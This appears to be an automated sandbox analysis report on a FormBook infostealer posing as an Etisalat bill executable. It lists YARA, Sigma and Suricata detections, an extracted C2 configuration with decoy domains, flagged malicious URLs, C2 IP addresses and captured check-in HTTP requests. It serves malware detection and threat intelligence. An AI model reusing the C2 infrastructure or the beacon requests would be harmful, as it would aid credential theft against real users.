0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", CommandLine: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", CommandLine|base64offset|contains: Jj, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", ParentImage: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe, ParentProcessId: 6544, ParentProcessName: Etisalat Summary Bill for the Month of August.exe, ProcessCommandLine: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", ProcessId: 5020, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", CommandLine: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", CommandLine|base64offset|contains: Jj, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", ParentImage: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe, ParentProcessId: 6544, ParentProcessName: Etisalat Summary Bill for the Month of August.exe, ProcessCommandLine: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe", ProcessId: 5020, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 213.186.33.5

Timestamp:	2024-08-30T10:26:56.932991+0200
SID:	2031412
Severity:	1
Source Port:	64520
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 213.186.33.5

Timestamp:	2024-08-30T10:26:56.932991+0200
SID:	2031449
Severity:	1
Source Port:	64520
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 213.186.33.5

Timestamp:	2024-08-30T10:26:56.932991+0200
SID:	2031453
Severity:	1
Source Port:	64520
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	2024-08-30T10:29:41.195600+0200
SID:	2031412
Severity:	1
Source Port:	64525
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	2024-08-30T10:29:41.195600+0200
SID:	2031449
Severity:	1
Source Port:	64525
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	2024-08-30T10:29:41.195600+0200
SID:	2031453
Severity:	1
Source Port:	64525
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 93.179.125.252

Timestamp:	2024-08-30T10:27:57.840329+0200
SID:	2031412
Severity:	1
Source Port:	64521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 93.179.125.252

Timestamp:	2024-08-30T10:27:57.840329+0200
SID:	2031449
Severity:	1
Source Port:	64521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 93.179.125.252

Timestamp:	2024-08-30T10:27:57.840329+0200
SID:	2031453
Severity:	1
Source Port:	64521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 76.223.105.230

Timestamp:	2024-08-30T10:25:55.441358+0200
SID:	2031412
Severity:	1
Source Port:	64524
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 76.223.105.230

Timestamp:	2024-08-30T10:25:55.441358+0200
SID:	2031449
Severity:	1
Source Port:	64524
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 76.223.105.230

Timestamp:	2024-08-30T10:25:55.441358+0200
SID:	2031453
Severity:	1
Source Port:	64524
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 198.185.159.144

Timestamp:	2024-08-30T10:25:55.441358+0200
SID:	2031412
Severity:	1
Source Port:	64526
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 198.185.159.144

Timestamp:	2024-08-30T10:25:55.441358+0200
SID:	2031449
Severity:	1
Source Port:	64526
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 198.185.159.144

Timestamp:	2024-08-30T10:25:55.441358+0200
SID:	2031453
Severity:	1
Source Port:	64526
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 162.254.39.135

Timestamp:	2024-08-30T10:28:38.766341+0200
SID:	2031412
Severity:	1
Source Port:	64523
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 162.254.39.135

Timestamp:	2024-08-30T10:28:38.766341+0200
SID:	2031449
Severity:	1
Source Port:	64523
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 162.254.39.135

Timestamp:	2024-08-30T10:28:38.766341+0200
SID:	2031453
Severity:	1
Source Port:	64523
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 199.116.255.220

Timestamp:	2024-08-30T10:28:18.670505+0200
SID:	2031412
Severity:	1
Source Port:	64522
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 199.116.255.220

Timestamp:	2024-08-30T10:28:18.670505+0200
SID:	2031449
Severity:	1
Source Port:	64522
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 199.116.255.220

Timestamp:	2024-08-30T10:28:18.670505+0200
SID:	2031453
Severity:	1
Source Port:	64522
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.vasymaman.com/pt46/	Avira URL Cloud: Label: malware
Source: http://www.dreziuy.xyz	Avira URL Cloud: Label: malware
Source: http://www.arlatwestern.shop	Avira URL Cloud: Label: phishing
Source: http://www.arlatwestern.shop/pt46/www.jrd3s.rest	Avira URL Cloud: Label: phishing
Source: http://www.dreziuy.xyz/pt46/www.dental-implants-89083.bond	Avira URL Cloud: Label: malware
Source: http://www.vasymaman.com/pt46/www.iiixc759q.xyz	Avira URL Cloud: Label: malware
Source: http://www.iiixc759q.xyz/pt46/	Avira URL Cloud: Label: malware
Source: http://www.iiixc759q.xyz/pt46/www.nihilculturamail.com	Avira URL Cloud: Label: malware
Source: http://www.dreziuy.xyz/pt46/	Avira URL Cloud: Label: malware
Source: http://www.arlatwestern.shop/pt46/	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.wheresthechocolateat.com/pt46/"], "decoy": ["twinportslocal.com", "rovor.store", "98169.club", "mdywl.com", "jrd3s.rest", "aston1717.top", "floridawoodworkingmachinery.com", "17tk555t.com", "ankitsho.shop", "seclameh.com", "realrecordlabel.com", "trenchonbirmingham.com", "af28.top", "rtp1kenzototo.com", "theselflovesite.com", "promotegetpaid.info", "strategiclogisticsagency.com", "learneracademy.net", "per-watch.com", "betbox2341.com", "22958.xyz", "birthdaywishestexts.com", "nihilculturamail.com", "vasymaman.com", "evriukpostaes.sbs", "winkingbots.com", "cb214.pro", "osakanacreation.com", "kingchuxing.com", "dr-cotton.net", "iiixc759q.xyz", "eraplay88rtpgacor.lat", "wguujb.com", "dental-implants-89083.bond", "liposuction-89237.bond", "harbalmaizik.com", "seoservicesdelhi.net", "fakefox.xyz", "wimetimephotos.com", "healthsaveplus.com", "wvufcw948o.top", "dieselrockpartners.com", "istchannelnet.com", "123moviesonl.com", "arlatwestern.shop", "cloudproduction.cloud", "gv3l1.vip", "casino-x-zerkalo27pm.xyz", "serverdayz.com", "dvdripguides.com", "vitalfitness.site", "c21candacedevillier.com", "gory12.online", "0452frl.com", "escpethemtrix.top", "koumimi.tech", "me29hs38g1.com", "dreziuy.xyz", "uddyen.shop", "asia76s.xyz", "melliccine.com", "olxelang.com", "paincareathome.com", "sliveringaf.christmas"]}

Multi AV Scanner detection for domain / URL

Source: healthsaveplus.com	Virustotal: Detection: 7%	Perma Link
Source: wheresthechocolateat.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.vasymaman.com/pt46/	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: Etisalat Summary Bill for the Month of August.exe	ReversingLabs: Detection: 42%
Source: Etisalat Summary Bill for the Month of August.exe	Virustotal: Detection: 24%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Etisalat Summary Bill for the Month of August.exe

Joe Sandbox ML: detected

Source: Etisalat Summary Bill for the Month of August.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: chkdsk.pdbGCTL source: svchost.exe, 00000002.00000002.2082896192.0000000003D80000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2082134723.000000000341B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486277348.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: svchost.exe, 00000002.00000002.2082896192.0000000003D80000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2082134723.000000000341B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486277348.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2021962175.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2022083360.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2082563492.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023933033.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2025699251.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2082563492.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487046366.00000000058E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2082681074.0000000005573000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2084491990.000000000572B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487046366.0000000005A7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2021962175.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2022083360.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2082563492.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023933033.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2025699251.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2082563492.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000004.00000002.4487046366.00000000058E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2082681074.0000000005573000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2084491990.000000000572B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487046366.0000000005A7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4498093805.0000000010E3F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486522930.0000000005258000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487592639.0000000005E2F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4498093805.0000000010E3F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486522930.0000000005258000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487592639.0000000005E2F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0090DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0090DBBE
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008DC2A2 FindFirstFileExW,	0_2_008DC2A2
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_009168EE FindFirstFileW,FindClose,	0_2_009168EE
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0091698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0091698F
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0090D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0090D076
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0090D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0090D3A9
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00919642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00919642
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0091979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0091979D
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00919B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00919B2B
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00915C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00915C97

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64520 -> 213.186.33.5:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64522 -> 199.116.255.220:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64520 -> 213.186.33.5:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64520 -> 213.186.33.5:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64522 -> 199.116.255.220:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64522 -> 199.116.255.220:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64521 -> 93.179.125.252:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64521 -> 93.179.125.252:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64521 -> 93.179.125.252:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64523 -> 162.254.39.135:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64523 -> 162.254.39.135:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64525 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64525 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64525 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64523 -> 162.254.39.135:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64524 -> 76.223.105.230:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64524 -> 76.223.105.230:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64524 -> 76.223.105.230:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64526 -> 198.185.159.144:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64526 -> 198.185.159.144:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:64526 -> 198.185.159.144:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.116.255.220 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.254.39.135 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 93.179.125.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.wheresthechocolateat.com/pt46/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.iiixc759q.xyz
Source:	DNS query: www.iiixc759q.xyz
Source:	DNS query: www.iiixc759q.xyz
Source:	DNS query: www.iiixc759q.xyz

Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=u/LO1vo0oQvnH9esjOgrxYTgs3EvA8CcnNa4WF9v/PnUIeIcp88TmQZ9gXPGHdW0FDBL&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.vasymaman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=1FKWbINWMtRGM8KgUHNDzt9XpNYq15fP8cs6Q3G+wyeIaD5IyqfTFlrSp9vb08dot3cu HTTP/1.1Host: www.gv3l1.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=p9DRcm8BELNBVMNAniPV5ICx4gmR3c1RxYXaT3CLClmXYljbHJslQ//IiGA9vCpcHBwF&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.healthsaveplus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=OxzdZkr64UrrS3tZ4G1zrrfmnH6WbOReSG/AAD7fX8giKNq6IAa+s9RhfDA3xDtWjS7D HTTP/1.1Host: www.seoservicesdelhi.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.wheresthechocolateat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.melliccine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve HTTP/1.1Host: www.trenchonbirmingham.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 213.186.33.5 213.186.33.5
Source: Joe Sandbox View	IP Address: 198.185.159.144 198.185.159.144
Source: Joe Sandbox View	IP Address: 198.185.159.144 198.185.159.144

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: GVOUS GVOUS
Source: Joe Sandbox View	ASN Name: SQUARESPACEUS SQUARESPACEUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0091CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0091CE44

Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=u/LO1vo0oQvnH9esjOgrxYTgs3EvA8CcnNa4WF9v/PnUIeIcp88TmQZ9gXPGHdW0FDBL&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.vasymaman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=1FKWbINWMtRGM8KgUHNDzt9XpNYq15fP8cs6Q3G+wyeIaD5IyqfTFlrSp9vb08dot3cu HTTP/1.1Host: www.gv3l1.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pt46/?BXIxB=p9DRcm8BELNBVMNAniPV5ICx4gmR3c1RxYXaT3CLClmXYljbHJslQ//IiGA9vCpcHBwF&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1Host: www.healthsaveplus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
